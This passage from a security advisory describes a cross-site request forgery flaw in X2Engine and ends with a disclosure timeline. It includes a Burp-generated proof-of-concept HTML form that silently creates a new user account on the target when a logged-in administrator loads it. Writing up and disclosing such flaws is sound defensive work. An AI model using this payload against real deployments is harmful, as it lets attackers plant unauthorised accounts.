The attacker\u2019s link would then be executed with administrator privileges.\r\n\r\nThis attack is not limited to sending malicious URLs to users; multiple different attack vectors exist to perform this attack in a more covert manner, such as embedding the attack within an invisible iFrame on a different page. Using the iFrame method it is also possible to submit both GET and POST requests.\r\n\r\nFor example:\r\n\r\n<html>\r\n <!-- CSRF PoC - generated by Burp Suite Professional -->\r\n <body>\r\n <form action=\"http://localhost/x2engine/index.php/users/create\" method=\"POST\">\r\n <input type=\"hidden\" name=\"User[firstName]\" value=\"John\" />\r\n <input type=\"hidden\" name=\"User[lastName]\" value=\"Smith\" />\r\n <input type=\"hidden\" name=\"User[username]\" value=\"adm1n\" />\r\n <input type=\"hidden\" name=\"User[password]\" value=\"letmein\" />\r\n <input type=\"hidden\" name=\"User[userKey]\" value=\"\" />\r\n <input type=\"hidden\" name=\"User[title]\" value=\"\" />\r\n <input type=\"hidden\" name=\"User[department]\" value=\"\" />\r\n <input type=\"hidden\" name=\"User[officePhone]\" value=\"\" />\r\n <input type=\"hidden\" name=\"User[cellPhone]\" value=\"\" />\r\n <input type=\"hidden\" name=\"User[homePhone]\" value=\"\" />\r\n <input type=\"hidden\" name=\"User[address]\" value=\"\" />\r\n <input type=\"hidden\" name=\"User[backgroundInfo]\" value=\"\" />\r\n <input type=\"hidden\" name=\"User[emailAddress]\" value=\"\" />\r\n <input type=\"hidden\" name=\"User[status]\" value=\"1\" />\r\n <input type=\"hidden\" name=\"yt0\" value=\"Create\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n\r\nExploit:\r\nExploit code is not required.\r\n\r\nRemediation:\r\nThe vendor has released a patch.\r\n\r\nVendor status:\r\n15/09/2014\tSubmitted initial contact via web form on X2Engine\u2019s page\r\n30/09/2014\tSecond initial contact message sent via web form\r\n08/12/2014\tFinal chaser sent via their web form\r\n20/01/2015\tAutomated response from the X2 website received on 08/12/2014.
